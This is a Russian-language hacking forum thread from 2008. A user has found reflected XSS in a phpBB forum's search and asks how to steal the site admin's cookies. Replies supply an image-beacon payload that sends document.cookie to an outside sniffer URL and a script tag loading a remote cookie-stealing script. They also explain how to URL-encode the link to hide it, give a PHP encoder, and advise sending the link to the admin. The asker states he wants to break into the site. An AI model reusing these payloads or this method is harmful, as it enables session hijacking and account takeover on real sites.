Xss в поиске...что дальше ?

Discussion in 'Уязвимости' started by geforse, 10 Jun 2008.

  1. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    623
    Likes Received:
    290
    Reputations:
    1
    Здрасте :)
    Извините если ни там запостил тему,,,,нужна помошь ачатовцев :)

    Вобщем есть сайт, там поиск, там есть XSS (активная вроде))

    вобщем если в поиске ввести

    "><script>alert('antichat.ru')</script>

    и нажать НАЙТИ,,,,то вылезает окошко с надписью античат...
    (тестировал в опере и осле 7)

    Теперь вопрос:

    Как получить куки пользователей если ксс в поиске :confused:
    Это вообще реально ?

    Спасибо :)
     
  2. Mo4x

    Mo4x VX-эпоха перемен

    Joined:
    18 Feb 2007
    Messages:
    369
    Likes Received:
    194
    Reputations:
    -21
    Это посевная хсс а не активная .
     
  3. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    623
    Likes Received:
    290
    Reputations:
    1
    Тоесть если я напишу админу письмо:

    Привет
    у тебя поиск не работает ( =


    Он зайдет в поиск...и как мне его куки своровать ?

    Я толко этого не пойму...
     
  4. k0lbasa

    k0lbasa Elder - Старейшина

    Joined:
    25 May 2008
    Messages:
    195
    Likes Received:
    132
    Reputations:
    -9
    http://forum.antichat.ru/thread20140.html
     
  5. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    Суй в линк снифер, шифруй, и суй линк зверю которого хочешь поиметь, смотри снифер, ставь куки, властвуй.
     
  6. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    623
    Likes Received:
    290
    Reputations:
    1
    k0lbasa
    Да я эту тему наизусть тебе могу рассказать ( =

    Тоесть если у меня будет сайт:

    мой_сайт.ру/xss.htm

    в xss.htm код
    HTML:
    '><script>img = new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;</script>
    Я кидаю ссылку админу в ЛС тип зайди на этот сайт....он заходит и его куки у меня :confused:

    Разве такое сработает ?
     
  7. ty13r

    ty13r Elder - Старейшина

    Joined:
    18 Jul 2007
    Messages:
    39
    Likes Received:
    2
    Reputations:
    0
    Ссылку ядовитую надо ему подсунуть где в урле чето типа того
    "><script scr=http://xxx.ru/script.js></script>
    где script.js шлет куки на снифер
     
  8. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,390
    Likes Received:
    1,209
    Reputations:
    475
    это пассивная
    хэк
     
    1 person likes this.
  9. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    623
    Likes Received:
    290
    Reputations:
    1
    Как же такое сделать если ксс толко в поиске есть :(
     
  10. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    623
    Likes Received:
    290
    Reputations:
    1
    Тоесть Xss, которую я в поиске нашёл...она вообще не нужна ?

    Если что-то в поиске искать, выводится так:

    www.site.com/ssearch.php?q=antichat.ru
     
  11. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    623
    Likes Received:
    290
    Reputations:
    1
    Когда чеовек получает сообщение с такой ссылкой,,,,вот что появляется
    Code:
    http://www.google.ru/search?q=%22%3E%3Cscript%20src=http://xxx.ru/script.js%3E%3C/script%3E
    [​IMG]
     
  12. Chaak

    Chaak Elder - Старейшина

    Joined:
    1 Jun 2008
    Messages:
    1,059
    Likes Received:
    1,067
    Reputations:
    80
    закодируй ссылку в urlencode
     
    1 person likes this.
  13. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    623
    Likes Received:
    290
    Reputations:
    1
    Закодировал...вставил в сообщение,,отослал:::вот что вылезает у получателя

    [​IMG]
     
  14. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    623
    Likes Received:
    290
    Reputations:
    1
    Значит xss в поиске использовать нельзя :(
     
  15. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    623
    Likes Received:
    290
    Reputations:
    1
    убрал...
    [​IMG]
    ------------------------------------------------------------------------------------------------------------------
    Я просканил этот сайт спайдером...вот он мне выдал
    [​IMG]

    Когда подставляю эти значения (в опере) и захожу на сайт....ни чего нет, я не авторизирован//


    Это форум phpBB 2.0.17,,,,только не посылайте в тему phpBB ни один эксплойт не работает и ксс тоже в сообщениях не пашет...вот только в поиске и работает :(
    З.Ы. там где точки я затёр пару символов))))
     
  16. diehard

    diehard Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    462
    Likes Received:
    267
    Reputations:
    15
    1) Залей скрипт, ворующий куки.
    2) Потом закодируй УРЛ ?search="><script scr=http://xxx.ru/script.js></script>
    например вот так:
    PHP:
    <TEXTAREA width=1000 height=1000>
    <?
    $st = $_GET["a"];
    for ($i=0;$i<strlen($st);$i++){
     $ch = substr($st,$i,1);
     echo "%".dechex(ord($ch));
    }
    ?>
    </TEXTAREA>
    3) Отсылай ссылку одмину
     
  17. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    623
    Likes Received:
    290
    Reputations:
    1
    diehard
    ОГРОМНОЕ спасибо за помошь...

    Но я не совсем понял....я на ВЫ с PHP....

    1) Скрипт лежит на сайте www.xxx.ru/js.js
    2)
    Code:
    http://site.ru/forum/ssearch.php?search="><script scr=http://xxx.ru/js.js></script>
    (ssearch.php всё правильно, там 2 s)

    Вот тут не совсем понял....как закодировать ???

    URL Encode ???
    ----------------------------------------------------------------------
    Что это за код и куда его "пихать" :confused:

    PHP:
     <TEXTAREA width=1000 height=1000> 
      <?  
     $st = $_GET["a"];   
    for ($i=0;$i<strlen($st);$i++){    
    $ch = substr($st,$i,1);    
    echo "%".dechex(ord($ch));  
     }  
     ?>   </TEXTAREA>
    Ещё раз извините за возможно идиотские вопросы....прошу, только ответте :(
     
  18. diehard

    diehard Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    462
    Likes Received:
    267
    Reputations:
    15
    Этот код сохрани в 1.php и запусти под сервером, хоть на локалхосте: http://localhost/1.php?a=search="><script scr=http://xxx.ru/js.js></script>
    В результате получится УРЛ вроде:
    Code:
    http://site.ru/forum/ssearch.php?%73%65%61%72%63%68%3d%22%3e%3c%73%63%72%69%70%74%20%73%63%72%3d%68%74%74%70%3a%2f%2f%78%78%78%2e%72%75%2f%6a%73%2e%6a%73%3e%3c%2f%73%63%72%69%70%74%3e
    
     
  19. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    623
    Likes Received:
    290
    Reputations:
    1
    Выходит вот что...

    Code:
    http://localhost/1.php?a=search=%22%3E%3Cscript%20scr=http://САЙТ.ru/js.js%3E%3C/script%3E
    Теперь нужно это подставлять к поиску на site.ru (который хочу взломать)

    или что-то опять не так делаю ??? :(
     
  20. diehard

    diehard Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    462
    Likes Received:
    267
    Reputations:
    15
    ОМГ, теперь нажми ENTER
    И исправь ошибку, не "scr=", а "src="
     
Loading...